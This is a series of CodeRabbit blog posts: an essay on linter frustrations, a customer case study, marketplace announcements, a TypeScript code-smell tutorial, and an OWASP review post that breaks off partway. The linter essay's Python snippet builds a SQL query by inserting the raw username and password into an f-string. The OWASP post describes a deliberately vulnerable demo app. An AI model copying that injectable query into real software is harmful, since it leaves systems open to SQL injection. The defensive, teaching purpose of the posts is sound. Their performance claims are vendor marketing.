(Bikeshedding)** One of the often-touted benefits of linters is that they supposedly end debates about code style. In reality, they can just shift the debate from “What style do we use?” to “Which rules do we enable or disable?” Teams can spend enormous amounts of time arguing over style guide configurations. Should we use trailing commas or not? Should we enforce camelCase, snake\_case, or PascalCase for certain identifiers? Should lines be limited to 80 characters, 100, or 120? Here's a typical scene in many development teams: A developer submits a critical authentication function for review: ```python def authenticate_user(user_data): username = user_data['username'] # Linter: line too long (81 chars) password = user_data['password'] # Linter: prefer single quotes if username and password: # Linter: missing whitespace result= query_db( # Linter: missing space around operator f"SELECT * FROM users WHERE username='{username}' AND password='{password}'" ) # Linter: trailing whitespace return result return None # Linter: inconsistent return statements ``` This can lead to what is known as “bikeshedding”—the phenomenon where groups spend disproportionate time discussing trivial details instead of focusing on more significant issues. Instead of eliminating debates, linters often just turn them into religious wars over rule sets. And once a certain style guide is chosen—often an off-the-shelf configuration like the Airbnb Style Guide—there can be pushback when team members try to tweak it. The environment can become rigid and dogmatic, further souring developers’ relationships with the tool. ## **Inflexible Rules and Contextual Nuance** A key limitation of linters is their inability to understand context. Code often has nuances that escape simplistic rule-based tools. For example, a particular code structure might violate a stylistic rule but make perfect sense in a specific scenario—perhaps it handles an edge case elegantly. The linter, however, doesn’t care about this context. It just sees a rule violation. Consider this matrix operation where readability improves when it is vertical aligned: ```python def transform_matrix(matrix): return [ [1, 0, 0], # Linter: trailing whitespace [0, 1, 0], # Linter: trailing whitespace [0, 0, 1] # Linter: trailing whitespace ] # What the linter forces you to write: return [[1,0,0],[0,1,0],[0,0,1]] # "Fixed" but less readable ``` As a result, developers sometimes find themselves writing awkward, less-intuitive code just to appease the linter. ## **The Illusion of Automatic Perfection** Another subtle issue is the risk that teams start treating the linter as a silver bullet for code quality. The presence of a linter and a “clean” linting report might foster a false sense of security. Managers or junior developers might assume that because the code passes all lint checks, it must be good. In reality, linters are just one small tool in a larger toolbox. When teams focus overly on linting, they may neglect other essential practices like peer reviews, architectural reviews, and thorough testing. As a result, some genuinely critical problems slip through the cracks because everyone was too busy ensuring that we followed a a specific coding style. Experienced developers often resent the notion that a set of automated-style checks could replace human judgment and good engineering practices. ## **Perceived Abuse of Power and Control** The feeling that linters can be used as a tool of control. If a team or a lead developer sets up extremely strict rules and won’t budge, others can feel micromanaged. Every minor commit leads to lint failures and demands for stylistic changes. Over time, this creates a hostile environment where developers feel their expertise and professional judgment aren’t trusted. Instead of collaboration, the coding style becomes a battleground for power dynamics. This resentment might not be rational in every case, but it exists. The line between helpful guidance and micromanagement can be thin. Development teams thrive on trust, respect, and autonomy. Linters, when misused, can undermine all three. ## **The Loss of Creative Freedom** > “Programming is the art of telling another human being what one wants the computer to do. We should continually strive to transform every art into a science: in the process, we advance the art” - Donald Knuth in Art of Programming. Software development, at its core, blends technical precision with creative expression. Developers often craft their code like artisans, choosing specific ways to structure and style their work that reflect their understanding and experience. But when linters enforce rigid rules, they can stifle this creative element. Imagine refactoring a complex code snippet (say a function) to readable, maintainable code, only to have a linter force you to break it up and reshape it according to inflexible rules. The code becomes less a reflection of your thought process and more a product of automated formatting. While consistency has its merits, especially in team settings, this mechanical enforcement can diminish the craft of coding and frustrate experienced developers who have developed their own effective coding styles. ## **Balancing the Benefits and Drawbacks** Despite all these reasons, it’s important to acknowledge that linters aren’t inherently evil. They can be incredibly valuable tools when used thoughtfully. The trick lies in striking a balance: use linters to catch genuine errors or enforce a minimal set of style rules that genuinely improve readability and consistency. Don’t treat them as the ultimate arbiter of “right” and “wrong” code. Allow exceptions when logic dictates that bending a stylistic rule leads to clearer, safer, or more maintainable code. Engage the team in deciding which rules matter and which don’t. ## Good linting practices might include ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c0b7b5f1061de2ee2aad820bcd83ceaee060b6902d0c4417ee731757f6aed08_4579e0f1a6.png) • **Start Small and Iterate:** Don’t drop a massive, fully strict configuration onto a **legacy** codebase. Begin with a small subset of rules that address common bugs or glaring style problems. Ramp up slowly, and give developers time to adapt. • **Team Input on Rules:** Rather than unilaterally choosing a style guide, get the whole team’s input. Aim for consensus and practicality. Keep the ruleset as minimal as possible. • **Context Matters:** Allow developers to disable certain rules in special cases. Make it easy to mark exceptions inline with comments and ensure these exceptions are justified. • **Focus on Big Wins:** Emphasize rules that prevent common errors, improve readability, or catch performance pitfalls. De-prioritize those that are purely aesthetic unless they serve a real purpose. • **Regular Reassessment:** As the codebase evolves and the team changes, revisit the linting rules. Rules that made sense a year ago might not make sense now. ## **To Conclude** None of this means we should throw away linters. But it does mean we need to be thoughtful about how we implement them. In a world where the complexity of systems continues to grow, tools that aid consistency and catch subtle errors can be invaluable—provided we remember their limitations and respect the human element in writing code. At [CodeRabbit](https://coderabbit.ai), we take a more intelligent approach to code quality by providing AI-powered code review that complements traditional linting tools with contextual suggestions and semantic understanding, moving beyond surface-level formatting to deliver meaningful code improvements.

Kintsugi: Transforming Remote Software Development Efficiency with CodeRabbit

Manpreet Kaur — Tue, 07 Jan 2025 00:00:00 GMT

## **At a Glance** ### **50% improvement in time to review code and merge PRs** **Vertical:** FinTech **Primary User:** Jeff Gibson, CTO **Coding languages:** Javascript and Python ### **Business Challenges** As a remote-first company growing fast, [Kintsugi](https://trykintsugi.com) wanted to increase efficiency and speed across its global development team. With 20+ developers working asynchronously across multiple time zones, PR cycles had to be fast to avoid long delays due to time zone differences. Their previous automated code review process failed to meet their evolving needs as it was inconsistent and not scalable. ### **Key challenges:** * **Scalability and Consistency:** The initial code review tool wasn’t providing actionable and consistent feedback as the team grew. * **Remote-first Complexity**: Manual first-pass reviews took too long in a fully remote environment where developers only had a few hours of overlapping time with each other daily, slowing down productivity. * **Not another Interface to Manage:** A distributed team required seamless integration into their existing Git workflow without adding yet another UI to manage that would increase operational complexity. ### **AI Code Reviews from CodeRabbit Deliver the Results** [Kintsugi](https://trykintsugi.com) joined the CodeRabbit startup program and saw benefits fast. Over 20 developers were using the platform within a week of signing up, and adoption was high. The benefits were: * **Streamlined PR Cycles:** Developers estimated CodeRabbit’s AI code reviews reduced PR cycle time by 50%, and PR merges were quicker. By automating first-pass reviews the team could focus on high-level business logic and customer experience instead of minor errors or inconsistencies. * **Improved Code Quality:** Consistent and actionable feedback improved bug detection, design suggestions, and tech debt management. Customizable settings like "chill vs assertive" mode allowed the team to tune the feedback to their workflow. * **Seamless Integration:** CodeRabbit’s direct integration of AI Code Reviews into the Git workflow eliminated the need for another tool, so the team could work in their existing environment. Support for creating and linking Jira tickets provided context for PRs. * **Remote-First Productivity:** AI Code Reviews allow asynchronous collaboration so that developers across time zones can work without friction during weekends or non-standard hours. *"It’s been a total game-changer for us as a remote-first team. Without it, we’d probably double the time spent on PR cycles."* – **Jeff Gibson, Co-Founder & CTO,** [**Kintsugi**](https://trykintsugi.com) ### **Summary** By adopting CodeRabbit’s AI Code Reviews, Kintsugi overcame its scaling and collaboration challenges in a remote-first environment. CodeRabbit’s robust capabilities that improve the review feedback over time and intuitive user experience delivered streamlined code reviews, reduced PR cycle times by **50%**, and empowered the team to focus on delivering impactful business solutions. **Get Started with CodeRabbit** You can utilize the power of AI Code Reviews with CodeRabbit as well. It takes less than 5 minutes, and no credit card is required, to integrate CodeRabbit with your git platform. [Start Your Free Trial](https://app.coderabbit.ai/login?free-trial), create a new pull request, and watch AI simplify your code reviews in just a few minutes. Questions? Reach out to our team for [support](https://www.coderabbit.ai/contact-us).

CodeRabbit Now Available on GCP Marketplace

Manpreet Kaur — Mon, 23 Dec 2024 00:00:00 GMT

Following the recent announcement of CodeRabbit being available on AWS marketplace, the CodeRabbit team is excited to announce that we are now also available on [GCP Marketplace](https://console.cloud.google.com/marketplace/product/coderabbit-public/coderabbit)! Enterprise customers aiming to adopt AI code reviews to deliver higher quality code more efficiently can now utilize their current spending agreements with GCP to finance CodeRabbit. This enables users to quickly embrace AI for their code reviews without needing to endure extensive budgetary approvals that can often take months thus delaying the adoption of AI in your software development workflow. Customers can utilize their spending commitments with GCP to purchase CodeRabbit in only a few clicks allowing the implementation of AI code reviews in days, not months. Here are the key details: * [CodeRabbit Enterprise](https://www.coderabbit.ai/enterprise) plan is supported on GCP marketplace. * Customers get CodeRabbit’s self-hosted container image that they can host in their own GCP environments. * The total purchase amount via GCP marketplaces is eligible to be counted towards customer’s spend commitments with GCP. * Minimum developer seat count for an GCP Marketplace purchase is 500 seats * Support available 24/7 and dedicated engineering onboarding assistance is included with every purchase fro the marketplace. Contact the CodeRabbit sales team ([sales@coderabbitl.ai](mailto:sales@coderabbitl.ai)) for discounted pricing for bulk purchases in the form of a GCP marketplace private offer that provides better rates tailored to your requirements. This represents a major advancement in assisting enterprise clients with the difficulties posed by the growing volume of code produced through AI code generators, even as the code review process continues to be predominantly manual. With the rapid adoption of tools such as GitHub Copilot, Cursor and others, the code generation process has been significantly augmented with AI. Companies aiming to quickly deploy features at scale must also enhance their manual code review process by incorporating automated AI code reviews. Here is how CodeRabbit can help such customers: 1. **Merge PRs 2x - 4x faster:** AI streamlines the initial phase of your code review process and detects bugs or errors in the code considerably faster than manual assessments, enabling you to merge your pull requests (PRs) 2x to 4x quicker and deliver more features with the same team strength 2. **Fix over 90%+ bugs and errors:** ensure no crucial mistakes get to production. Manual evaluations may be susceptible to mistakes and occasionally overlook a significant error, which can be quite costly to rectify in production. By utilizing AI code reviews, you will consistently remain aware of crucial errors and address them during the code review process before they affect any customers 3. **Enhance Code Quality:** AI code evaluations get better with consistent usage. This elevates your development team’s capabilities by ensuring an expert in all languages is continuously accessible for you directly within your Git platform. 4. **Maintain Data Privacy:** store your code reviews and evaluations within your own infrastructure. Execute CodeRabbit’s container image in your self-hosted GCP container to maintain full control over data privacy and guarantee alignment with your security policies Thousands of customers have embraced CodeRabbit to enhance their code review workflows with AI assistance. You can see their statements on [our website](https://coderabbit.ai/). Ready to implement AI Code Reviews in your software development lifecycle? Reach out to [sales@coderabbit.ai](mailto:sales@coderabbit.ai) and we would love to get you going with CodeRabbit on GCP.

How to Identify and Fix Code Smells in TypeScript using CodeRabbit

Aravind Putrevu — Thu, 19 Dec 2024 00:00:00 GMT

Integrating [AI-powered code reviews](https://www.coderabbit.ai/blog/how-to-automate-typescript-code-reviews-with-coderabbit) in modern development workflows has fundamentally changed how development teams approach TypeScript projects. While TypeScript's built-in features help catch errors early through [static type checking](https://www.coderabbit.ai/blog/boosting-static-analysis-accuracy-with-ai), maintaining overall code quality becomes critical as codebases grow. Traditional code review processes and pair programming can slow development cycles when applied to larger teams or complex systems. This tutorial will demonstrate how to enhance a TypeScript project by identifying code smells and improving code quality in a real-world example—a job board designed for TypeScript developers. Let’s start by looking into what “code smells” are and why they’re important to address! ## Understanding Code Smells and Why They Matter Code smells are signs or patterns that suggest underlying issues in a code’s design or structure. While these issues may not cause immediate bugs or errors, they can lead to problems in the future, such as decreased maintainability, reduced readability, or difficulty in scaling the application. Recognizing and addressing [code smells](https://builtin.com/software-engineering-perspectives/code-smells) is essential for improving code quality and ensuring a more robust and efficient codebase. Some common TypeScript code smells include [long functions](https://maximilianocontieri.com/code-smell-03-functions-are-too-long), [duplicated code](https://code-smells.com/dispensables/duplicate-code), and [complex conditionals](https://luzkan.github.io/smells/conditional-complexity)**,** which can affect performance and readability over time. For any TypeScript project, identifying these early allows developers to refactor and maintain clean code. This is crucial for your application to remain scalable and maintainable as it grows. In large projects like [Slack](https://slack.com/), which uses TypeScript to grow its software, code smells can pile up over time, leading to technical debt. This can eventually affect how well the software works for users, which is bad for the business. AI tools help [spot and fix these issues automatically](https://www.coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices) so teams can focus on building new features faster without worrying about code quality. Let's identify common code smells in TypeScript and explore how to spot them in code snippets. ## Identifying Common Code Smells in TypeScript Here are key patterns programmers should watch for when reviewing source code: * **Long Functions:** Multiple functions or class methods handling too many responsibilities make testing and maintenance challenging. ```typescript function processJobApplication(job: Job, applicant: Applicant) { // handles filtering, validation, notification, etc. // too many responsibilities in one function } ``` * **Duplicated Code:** Repeated code fragments across multiple places indicate refactoring opportunities. ```typescript function displayJobTitle(job: Job) { console.log(job.title); } function showJobTitle(job: Job) { console.log(job.title); } ``` * **Complex Conditionals:** Nested or complicated conditions can make code difficult to understand and debug. ```typescript if (job.salary > 50000 && job.location === 'remote' && job.type === 'full-time') { // complex logic that could be simplified } ``` Manual code reviews can be time-consuming when dealing with large codebases, especially when [identifying and addressing code smells](https://www.coderabbit.ai/blog/coderabbit-deep-dive) such as in-functions for filtering jobs or displaying job details. Using a TypeScript job board project, the section below will demonstrate how AI-powered code review tools can automatically detect and flag these issues, making it easier to refactor your code efficiently. ## Setting up the TypeScript Job Board This tutorial will walk you through creating a job board application where you'll implement type-safe features and use an AI-powered code review tool to catch potential issues. ## Prerequisites You must have the following to get started: * Familiarity with TypeScript, React, or Next.js. * Node.js, npm installed. * [Shadcn UI](https://ui.shadcn.com/) installed * [CodeRabbit](https://coderabbit.ai/) account. * [VS Code](https://code.visualstudio.com/) (or another code editor). To set up the job board quickly, clone the [repository from GitHub](https://github.com/Tabintel/typescript-job-board), install dependencies, and run the app locally with the commands below: 1. Clone the repository: ```bash git clone https://github.com/Tabintel/typescript-job-board.git ``` 2. Install dependencies: ```bash cd typescript-job-board npm install ``` 3. Run the application: ```bash npm run dev ``` 4. Open `localhost:3000` in your browser to view the TypeScript job board: ![TypeScript job board built with Next.js and TypeScript](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729353030201_image.png) The job board is designed to help TypeScript developers find job opportunities. It includes a sidebar for filtering jobs, dynamically generated job cards, and a responsive layout. With the application up and running, let’s focus on how AI code review tools like [CodeRabbit](https://www.coderabbit.ai/blog/boosting-engineering-efficiency) can help us catch and address code smells. ## Setting up AI-Powered Code Review [Create an account](https://app.coderabbit.ai/login?free-trial) and follow the [integration guidelines in the documentation](https://docs.coderabbit.ai/#integration-with-github-gitlab-and-azure-devops) to integrate AI into your workflow. Once installed, you can start utilizing AI to streamline code reviews and maintain high-quality standards in your TypeScript projects. To activate the review process, create a branch on your repository, make code updates, push, and initiate a pull request (PR). Let’s create a new feature for the job board application by running the command below in the terminal: ```bash git checkout -b feature/job-application-form ``` This feature will allow TypeScript developers using the job board to apply for jobs directly through the platform. The components include: * TypeScript interfaces for form data validation. * Strongly typed form handling with React state management. * Type-safe event handlers for form submissions. Next, create a `JobApplicationForm` component in the `src/app/components/` directory and enter the code from this [GitHub gist](https://gist.github.com/Tabintel/74675122f48d70486295e2d5a00bdb14). Once you've added the code, commit and push the changes to your GitHub repository using the following commands: ```bash git add src/components/JobApplicationForm.tsx git commit -m "feat: add job application form with TypeScript" git push origin feature/job-application-form ``` Then, navigate to your GitHub repository, where you’ll see a prompt to create a pull request from the new branch. Create the **pull request** (PR) with a descriptive title and description of the new feature. ![Create a Pull Request](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1732378453779_image.png) The pull request triggers an AI-powered code review process, analyzing the source code for potential code smells and areas needing refactoring. ![CodeRabbit review process](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729686687508_CodeRinProd.png) ## Analysis and Review of the Code Smells After creating the PR, AI-powered code review tools automatically analyze your code, identify several issues, and add a nice poem for the job board, as indicated in the image: ![CodeRabbit’s walkthrough for the code review](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729769878888_image.png) It suggests code that can be refactored to fix the code smell, as shown below: ![Code smells highlighted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729688179743_image.png) It also highlights code smells in the TypeScript code that are potential issues: ![Other code smells in the TypeScript code](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1729769484819_image.png) Let's break down the **code smells** found in `JobApplicationForm.tsx` by looking at the original code and also reviewing the improvements and suggestions from the automated review. **Inadequate State Management** The existing code shows common code smells in state management. Without clear loading indicators and error-handling states, users are left without feedback during form submissions, which can result in a confusing user experience. AI code review tools help identify and suggest strategies to address such gaps. ![State management code smell spotted by CodeRabbit with suggestions](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730288226894_scode1.png) The solution from the AI code review introduces **comprehensive state management with loading and error states**. The `isSubmitting flag` enables proper loading indicators, while the error state allows for meaningful error messages. The default TypeScript experience is set to one year, providing job applicants with a more realistic starting point. ```typescript // CodeRabbit's Improved Solution const [isSubmitting, setIsSubmitting] = useState(false) const [error, setError] = useState(null) const [application, setApplication] = useState({ position: '', yearsOfTypeScript: 1, // Better default value githubProfile: '', email: '', portfolioUrl: '' }) ``` **Missing Error States** From the review below, the **form submission handler lacks proper error handling** and doesn't manage the submission lifecycle. This can lead to silent failures and provide no feedback to users when something goes wrong. ![Error handling code smell spotted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730930421627_main+errr.png) The improved submission handler **implements a proper async/await pattern** with comprehensive error handling. It manages the entire submission lifecycle, from setting loading states to handling errors and success cases, making sure users always know the status of their submission. ```typescript const handleSubmit = async (e: React.FormEvent) => { e.preventDefault() try { setIsSubmitting(true) setError(null) await submitApplication(application) // Show success message } catch (err) { setError(err instanceof Error ? err.message : 'Submission failed') } finally { setIsSubmitting(false) } } ``` **Untyped Promise Response** The use of `any` type in Promise returns can hinder TypeScript’s type safety and reduce clarity for other developers. Implementing strongly typed return values and input validation is a recommended approach. ![Untyped promise response code smell spotted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730930543721_hmb.png) The automated code review tool **implements proper typing** for the Promise return value and adds input validation. This maintains type safety throughout the application flow and provides clear feedback for validation errors. ```typescript const submitApplication = (data: JobApplication) => { return new Promise<{ success: boolean; message?: string }>((resolve, reject) => { if (!data.email.includes('@')) { reject(new Error('Invalid email format')) return } resolve({ success: true, message: 'Application submitted successfully' }) }) } ``` **Poor** **Accessibility** The form **lacks proper accessibility** **attributes**, making it difficult for screen readers to provide meaningful information to users with special needs. ![Poor Accessibility code smell spotted by CodeRabbit](https://paper-attachments.dropboxusercontent.com/s_154FEC08EAA1C20DB5AAA26FB7C21BD8E180657876D929ACDE45DFB50C6FE7E1_1730930788568_image.png) The enhanced form includes proper [ARIA attributes and roles](https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA/Roles)**,** making it accessible to screen readers and assistive technologies. The `noValidate` attribute allows for custom form validation while maintaining accessibility. ```typescript ``` Through this automated code review process, you’ve learned valuable lessons about TypeScript development. **Proper type definitions** serve as both documentation and runtime safeguards. **Error handling** becomes more predictable when properly typed, and **accessibility features** become natural parts of the development process rather than afterthoughts. ## Continuously Improving Code Quality with AI Code Reviews Incorporating AI-powered code review tools brings lasting improvements to your development process. Here's how it helps improve both your source code quality and overall development efficiency: * **Efficient Development**: With automated code review tools continuously identifying code smells during development, programmers can focus on building better software features while reducing time spent on manual code reviews and pair programming sessions. * **Technical Debt Prevention**: By detecting and addressing code smells early, development teams prevent deeper problems from escalating into complex issues. This proactive approach to code cleaner practices ensures maintainable codebases across multiple functions and class methods. * **Enhanced Code Quality**: Clean, organized source code with proper type information minimizes bugs and errors. The systematic use of primitive types and type inference makes scaling easier, allowing open-source projects to evolve smoothly as new functionality is added. ## What’s Next? Now that you have learned how to identify and address code smells in TypeScript using AI-powered code review, here are some additional considerations and next steps to enhance your development process: 1. **Refining TypeScript Practices**: As you continue to improve your codebase, it’s helpful to focus on enhancing your use of TypeScript’s more advanced features, such as [generics](https://www.typescriptlang.org/docs/handbook/2/generics.html) and [type inference](https://www.typescriptlang.org/docs/handbook/2/everyday-types.html#type-inference). These can lead to better maintainability and fewer runtime errors. 2. **Integrating AI with Human Insights**: While [AI code review tools](https://www.coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices) like CodeRabbit are powerful, they should be balanced with human insights. Encourage team members to review AI-generated feedback and provide their perspectives to build a learning and continuous improvement culture. 3. **Staying Up to Date**: TypeScript constantly evolves with new features and updates. Monitor the [latest changes](https://devblogs.microsoft.com/typescript/), such as [stricter types](https://www.typescriptlang.org/tsconfig/#strict) or [improved tooling](https://www.typescriptlang.org/docs/handbook/typescript-tooling-in-5-minutes.html), to incorporate better practices and avoid potential pitfalls. ## Final Thought AI tools empower developers to analyze TypeScript (or other programming languages) source code, identify common code smell patterns, and implement refactoring opportunities that elevate code quality standards. The development workflow becomes faster and more efficient, enabling teams to ship software confidently. Ready to enhance your TypeScript projects with better software practices? [Sign up for CodeRabbit](https://coderabbit.ai/) today and experience the benefits of AI-powered code reviews.

CodeRabbit Now Available on AWS Marketplace

Sahil Mohan Bansal — Tue, 17 Dec 2024 00:00:00 GMT

The CodeRabbit team is excited to announce that we are now available on [AWS Marketplace](https://aws.amazon.com/marketplace/pp/prodview-wkkkre4fgelwq)! Enterprise customers looking to implement AI code reviews in order to ship better quality code in lesser time can now leverage their existing spend commitments with AWS to pay for CodeRabbit. This allows customers to more rapidly adopt AI to power their code reviews without having to go through lengthy budgetary approvals. Customers can use their spend commitments with AWS to pay for CodeRabbit in just a few clicks. Here are the key details: * [CodeRabbit Enterprise](https://www.coderabbit.ai/enterprise) plan is supported on AWS marketplace. * Customers get CodeRabbit’s self-hosted container image that they can host in their own AWS EKS or ECS environments. * The total purchase amount via AWS marketplaces is eligible to be counted towards customer’s spend commitments with AWS * Minimum developer seat count for an AWS Marketplace purchase is 500 seats * 24x7 support and dedicated onboarding engineering support is included with all marketplace purchases Reach out to CodeRabbit sales team ([sales@coderabbitl.ai](mailto:sales@coderabbitl.ai)) for discounted pricing for bulk purchases in the form of a AWS marketplace private offer with more attractive pricing that meets your needs. This is a significant step forward in helping enterprise customers deal with the challenges of ever increasing quantity of code being generated using the power of AI, while the code review process remains largely manual. With the rapid adoption of tools such as GitHub Copilot, the code generation process has been augmented with AI. Enterprises who want to ship features rapidly, at scale, need to also augment their manual code review process with automated AI code reviews. Here is how CodeRabbit can help such customers: 1. **Merge PRs 2x - 4x faster:** AI automates the first-pass of your code review cycle and finds any bugs or errors in the code much faster than manual reviews, allowing you to merge your pull requests (PRs) 2x to 4x faster and ship more features with the same team size 2. **Catch 90%+ bugs and errors:** never miss a critical error from reaching production. Manual reviews can be error prone and sometimes miss a critical error which can be very expensive to fix in production. With the power of AI code reviews, you will always stay on top of any critical erros and catch up during the code review cycle before they impact any customers 3. **Improve Code Quality:** AI code reviews improve over time the more you use them. This raises the floor of your development team by having an expert in all languages always available that you can leverage directly in your existing Git platform 4. **Maintain Data Privacy:** keep your code-reviews and analysis in your own private infrastructure. Run CodeRabbit’s container image in your self-hosted environment for complete control over data privacy and ensure compliance with your security policies Thousands of customers have already adopted CodeRabbit to improve their code review process using AI. You can read what they are saying on [our website](https://coderabbit.ai/). Ready to implement AI Code Reviews in your software development lifecycle? Reach out to [sales@coderabbit.ai](mailto:sales@coderabbit.ai) and we would love to get you going with AI Code Reviews. *p.s. - yes, support for GCP and Azure Marketplaces is coming very soon too!*

How to Automate OWASP Security Reviews in Your Pull Requests?

Atulpriya Sharma — Mon, 16 Dec 2024 00:00:00 GMT

The increasing reliance on web applications has made security a paramount concern for organizations worldwide. As they become more integrated, robust security is crucial. [Recent reports](https://www.techradar.com/pro/security/ai-tools-are-being-increasingly-abused-to-launch-cyberattacks) indicate a rise in AI-driven attacks, with over 500,000 incidents occurring daily that target retail APIs, DDoS exploits, and advanced phishing campaigns capitalizing GenAI capabilities. This has led to the emergence of AI Red Teaming startups that simulate these threats to identify and mitigate vulnerabilities proactively. The emergence of AI-driven applications, including those leveraging large language models (LLMs), has introduced unique challenges like prompt injection and data poisoning, underscoring how the battlefield is constantly evolving. To address these, many organizations turn to the Open Web Application Security Project (OWASP), a nonprofit foundation dedicated to improving software security by providing resources and guidance on developing secure applications. In this blog post, we’ll explore how to detect and address these vulnerabilities before production, minimizing the risk of breaches and enhancing the overall security of applications. ## OWASP 101 [OWASP’s](https://owasp.org/) mission is to provide free resources, tools, and documentation to help protect applications from attackers. It supports the global developer and security communities by offering training, best practices, and community-driven projects to improve software security. OWASP also fosters collaboration through training, conferences, and global community projects to tackle emerging security threats [OWASP Top 10](https://owasp.org/www-project-top-ten/) lists the most prevalent security risks and serves as an essential resource for building secure applications. The organization emerged in response to the growing intricacy and interconnectedness of web applications, which have created numerous potential vulnerabilities that malicious actors could exploit. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/adb080b98cabd344d06c5162168dc243966547b7bbcd3f4f75c8e1240716e9c6_94b60c168b.png) Below are the OWASP Top 10 vulnerabilities, each representing a critical risk to the security of web applications: 1. **Broken Access Control:** Unauthorized access to resources due to improper restrictions. 2. **Cryptographic Failures:** Weak encryption or improper handling of sensitive data. 3. **Injection:** Untrusted data affecting queries or commands, leading to code execution. 4. **Insecure Design:** Security flaws in system architecture or design. 5. **Security Misconfiguration:** Inadequate system configurations leading to vulnerabilities. 6. **Vulnerable and Outdated Components:** Use of insecure or outdated software components. 7. **Identification and Authentication Failures:** Weak or flawed authentication mechanisms. 8. **Software and Data Integrity Failures:** Lack of checks for untrusted data or tampered software. 9. **Security Logging and Monitoring Failures:** Insufficient logging or monitoring of security events. 10. **Server-Side Request Forgery (SSRF):** Attacker sends unauthorized requests from the server. Manual code reviews are essential for identifying risks, but detecting every deviation in complex systems can be challenging. Despite best efforts, catching all deviations from secure coding practices is difficult. This is where automated code review tools like CodeRabbit come into play. They help to identify vulnerabilities early in the development process and minimize the risk of security issues making it into production. With Coderabbit, the review process can be streamlined, ensuring faster identification and resolution of security risks and helping developers stay ahead of potential threats. ## Finding OWASP Violations With CodeRabbit We developed a React web application intentionally configured with security violations to demonstrate CodeRabbit's effectiveness in identifying OWASP's Top 10 vulnerabilities. These included common missteps such as insecure authentication, unvalidated inputs, and missing encryption, all of which violate key OWASP guidelines. The diagram below gives a high-level overview of the application. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b114bb86847f6a13a6386d043ca5a2424544961a832f05cab741b0d6f9df6231_16cd634b33.png) Before diving into the details, here's a high-level overview of the flow of interactions between the client, authentication, and profile services in the application. * The user enters credentials in the Login Component and submits the form. * A POST request is sent to the /login endpoint in the Authentication Service. * The /login endpoint verifies credentials using SQLite with MD5 password hashing. * A token and user data are stored in Local Storage. * User is redirected to the Dashboard Component upon successful login. * The Dashboard sends GET requests to /profile and /fetch-avatar endpoints in the Profile Service. You can find the web app in this [GitHub Branch](https://github.com/coderabbitai/coderabbit-pr-review/tree/owasp-top10). With just **two clicks**, we [integrated CodeRabbit](https://docs.coderabbit.ai/getting-started/quickstart) into the repository. When a pull request is created, CodeRabbit performs an automatic review and generates a detailed security report with three key sections. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7579a4406bebdf6b0868b43198258bd4719c52c8434ce1e75d4b869db62912e7_d75d3f5a44.png) * **Summary**: Highlights major security concerns and areas that need immediate attention. * **Walkthrough**: Provides a step-by-step breakdown of the reviewed files, pointing out specific issues and offering actionable recommendations. * **Table of Changes**: Lists all the files modified, with a summary of detected issues, helping developers prioritize fixes. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/322742877bde1b12a6c5cdde0754a08171a36b2e439479d334bfa3e9d7c7d21d_a440bf163e.png) Here are the five OWASP risks that were successfully identified, along with suggested fixes to enhance application security. ### **Broken Access Control (A01:2021)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1fad2ae0f1c11df3f5c83db70351eef2191d0e7472114533c999eded19cf4cee_76158f4c99.png) CodeRabbit has identified that the routing configuration does not enforce proper access control, particularly for the /dashboard route. This can allow unauthorized users to gain access to sensitive parts of the application without proper authentication. This issue violates Broken Access Control (A01:2021), a critical security risk identified by OWASP. Without proper verification, users may access parts of the application they shouldn't, leading to potential unauthorized actions or data exposure It suggests implementing a ProtectedRoute component that checks for user authentication before allowing access to sensitive routes, such as the /dashboard. This ensures that only authenticated users can navigate to restricted areas, effectively preventing unauthorized access and protecting sensitive data. Check out the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619348) for more details. ### **Cryptographic Failures (A02:2021)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cc0f22a5b285ce0c51bec426e1557009629c1eb633d9a87d0690ffbcaf6a9162_698407a14c.png) It has been identified that the hash\_password function uses MD5 for password hashing, which is considered weak and vulnerable to attacks such as collision attacks. This violates OWASP's Cryptographic Failures (A02:2021) risk, highlighting the importance of using strong cryptographic algorithms to protect sensitive data like passwords. To resolve it, it suggests using a stronger, more secure password hashing algorithm like bcrypt or Argon2. A better approach would be to use the Werkzeug.security module's generate\_password\_hash function, which is designed for secure password hashing and provides better protection against potential attacks. Check out the [review comment](https://github.com/coderabbitai/coderabbit-pr-review/pull/1#discussion_r1867619376) for more details. ### **SQL Injection (A03:2021)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7d0936a7ccf970d9f4210408f12d1be357a0a66f7df45acf221e2b3f22d0d926_cf0bc43066.png) The current implementation directly concatenates user input into the SQL query, which exposes the application to SQL injection attacks. This violates the OWASP Injection (A03:2021) risk, highlighting the dangers of improperly handling user input in SQL queries, potentially allowing attackers to execute arbitrary SQL code. To enhance security against 